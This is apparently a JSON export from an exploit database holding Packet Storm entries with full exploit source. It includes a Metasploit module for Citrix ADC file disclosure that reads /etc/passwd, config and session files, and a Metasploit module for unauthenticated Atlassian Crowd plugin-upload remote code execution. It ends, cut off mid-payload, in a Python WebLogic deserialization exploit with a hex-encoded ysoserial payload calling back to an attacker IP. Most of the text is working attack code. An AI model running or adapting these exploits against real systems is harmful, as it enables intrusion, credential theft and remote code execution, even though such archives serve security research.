\n['URL', 'https://dmaasland.github.io/posts/citrix.html'], \n['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'], \n['URL', 'https://github.com/jas502n/CVE-2020-8193'] \n], \n'DisclosureDate' => '2020-07-09', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n} \n)) \n \nregister_options([ \nOptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]), \nOptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef create_session \nparams = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1' \n \nrequest = { \n'method' => 'POST', \n'uri' => \"#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}\", \n'ctype' => 'application/xml', \n'headers' => { \n'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8), \n'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8) \n}, \n'data' => '<appfwprofile><login></login></appfwprofile>' \n} \nrequest = request.merge({'cookie' => @cookie}) if @cookie \n \nresponse = send_request_raw(request) \nunless response && response.code == 406 \nprint_error(\"#{@message_prefix} - No response to session request.\") \nreturn \nend \n \nresponse.get_cookies \nend \n \ndef fix_session_rand \nresponse = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'menu', 'ss'), \n'cookie' => @cookie, \n'vars_get' => { \n'sid' => 'nsroot', \n'username' => 'nsroot', \n'force_setup' => '1' \n} \n) \n \nif response && response.code == 302 \nlocation = response.headers['location'] \n \nresponse = send_request_cgi( \n'method' => 'GET', \n'uri' => location, \n'cookie' => @cookie \n) \n \nreturn unless response && response.code == 200 \nend \n \nresponse.to_s.scan(/rand = \"([^\"]+)\"/).join \nend \n \ndef read_lfi(path, var_rand) \nparams = \"filter=path:#{path}\" \n \nrequest = { \n'method' => 'POST', \n'uri' => \"#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}\", \n'cookie' => @cookie, \n'ctype' => 'application/xml', \n'headers' => { \n'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8), \n'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8), \n'rand_key' => var_rand \n}, \n'data' => '<clipermission></clipermission>' \n} \n \nresponse = send_request_raw(request) \nend \n \ndef run_host(ip) \nproto = (datastore['SSL'] ? 'https' : 'http') \n@message_prefix = \"#{proto}://#{ip}:#{datastore['RPORT']}\" \n \n@cookie = create_session \nif @cookie && @cookie =~ /SESSID/ \nprint_status(\"#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}\") \n \nvar_rand = fix_session_rand \nunless var_rand \nprint_error(\"#{@message_prefix} - Unable to get rand value.\") \nreturn Exploit::CheckCode::Unknown \nend \nprint_status(\"#{@message_prefix} - Got rand: #{var_rand}\") \n \nprint_status(\"#{@message_prefix} - Re-breaking session...\") \ncreate_session \n \ncase datastore['MODE'] \nwhen /discovery/ \nresponse = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand) \nif response.code == 406 \nif response.body.include? ('root:*:0:0:') \nprint_warning(\"#{@message_prefix} - Vulnerable.\") \n \nreturn Exploit::CheckCode::Vulnerable \nend \nend \nwhen /interactive/ \n# TODO: parse response \nresponse = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand) \nif response.code == 406 \nprint_line(\"#{response.body}\") \nend \n \nreturn \nwhen /sessions/ \n# TODO: parse response \nresponse = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand) \nif response.code == 406 \nprint_line(\"#{response.body}\") \nend \n \nreturn \nend \nend \nprint_good(\"#{@message_prefix} - Not Vulnerable.\") \n \nreturn Exploit::CheckCode::Safe \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160047/citrixadvnetscaler-lfi.rb.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-12T16:10:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "packetstorm", "title": "Atlassian Crowd pdkinstall Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2021-08-12T00:00:00", "id": "PACKETSTORM:163810", "href": "https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE', \n'Description' => %q{ \nThis module can be used to upload a plugin on Atlassian Cloud via \nthe pdkinstall development plugin as an unauthenticated attacker. \nThe payload is uploaded as a JAR archive containing a servlet using \na POST request to /crowd/admin/uploadplugin.action. The check command will \ncheck that the /crowd/admin/uploadplugin.action page exists and that it \nresponds appropriately to determine if the target is vulnerable or not. \n}, \n'Author' => [ \n'Paul', # Vulnerability discovery \n'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter. \n'Grant Willcox' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-11580'], \n['URL', 'https://jira.atlassian.com/browse/CWD-5388'], \n['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'], \n['URL', 'https://www.corben.io/atlassian-crowd-rce/'] \n], \n'Platform' => %w[java], \n'Arch' => ARCH_JAVA, \n'DefaultOptions' => { \n'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out. \n}, \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'Targets' => \n[ \n[ \n'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n] \n], \n'DisclosureDate' => '2019-05-22' \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8095), \nOptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']), \n \n] \n) \nend \n \ndef upload_plugin(content) \ndata = Rex::MIME::Message.new \ndata.add_part(content, nil, 'binary', \"form-data; name=\\\"file_#{Rex::Text.rand_text_alpha(8..12)}\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(8..12)}.jar\\\"\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'), \n'method' => 'POST', \n'data' => data.to_s, \n'ctype' => \"multipart/mixed; boundary=#{data.bound}\" \n}, datastore['HttpClientTimeout']) \nend \n \ndef generate_plugin_jar \nname = Rex::Text.rand_text_alpha(8..12) \nservlet_name = Rex::Text.rand_text_alpha(8..12) \natlassian_plugin_xml = %( \n<atlassian-plugin key=\"metasploit.PayloadServlet\" name=\"#{name}\" plugins-version=\"2\" class=\"metasploit.PayloadServlet\"> \n<plugin-info> \n<param name=\"atlassian-data-center-compatible\">true</param> \n<description></description> \n<version>1.0.0</version> \n</plugin-info> \n \n<servlet name=\"#{servlet_name}\" key=\"#{servlet_name}\" class=\"metasploit.PayloadServlet\"> \n<url-pattern>/#{name}</url-pattern> \n<description>#{Faker::App.name}</description> \n</servlet> \n</atlassian-plugin> \n) \n \n# Generates .jar file for upload \nzip = payload.encoded_jar \nzip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) \n \nservlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class') \nzip.add_file('/metasploit/PayloadServlet.class', servlet) \n \ncontents = zip.pack \n[contents, name] \nend \n \ndef check \nprint_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...') \nres = upload_plugin(Rex::Text.rand_text_alpha(45..120)) \nif res.nil? \nCheckCode::Unknown('Was not able to connect to the target!') \nelsif (res.body =~ /Unable to install plugin/) && (res.code == 400) \nCheckCode::Vulnerable(\"Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!\") \nelse \nCheckCode::Safe(\"Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!\") \nend \nend \n \ndef exploit \nprint_status('Generating a malicious JAR plugin...') \ncontent, plugin_name = generate_plugin_jar \nprint_status('Uploading the malicious JAR plugin...') \nupload_plugin(content) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, \"/plugins/servlet/#{plugin_name}\"), \n'method' => 'GET' \n}, datastore['HttpClientTimeout']) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163810/atlassian_crowd_pdkinstall_plugin_upload_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-29T22:20:57", "description": "", "cvss3": {}, "published": "2017-09-29T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-29T00:00:00", "id": "PACKETSTORM:144405", "href": "https://packetstormsecurity.com/files/144405/Oracle-WebLogic-Server-Java-Deserialization-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution] \n# Date: [27/09/2017] \n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot \n# Vulnerability Author: FoxGloveSecurity \n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html] \n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0] \n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr] \n# CVE : [CVE-2015-4852] \n \n''' \nThis exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send \nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful. \nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \nthis script will do it for you on the fly. \n''' \n \n#!/usr/bin/env python \nimport socket \nimport sys \nimport struct \nfrom binascii import unhexlify \n \nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\" \nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\" \n \nif len(sys.argv) < 2: \nprint \"\\n[+]Please provide target IP and Port...\" \nprint \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\" \nsys.exit() \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver_address = (sys.argv[1], int(sys.argv[2])) \nprint '[+]Connecting to %s port %s' % server_address \nsock.connect(server_address) \n \n#Send headers \nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n' \nprint '[+]Sending\\n\"%s\"' % headers \nsock.sendall(headers) \n \ndata = sock.recv(1024) \nprint >>sys.stderr, '\\n[+]Received \"%s\"' % data \n \n \n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload. \n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length \nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00' \n \n \n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out \n#len(payload) is xxxx bytes \n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target. \n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload. \n \n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :) \nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\" \n \n \nchunk3 = '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x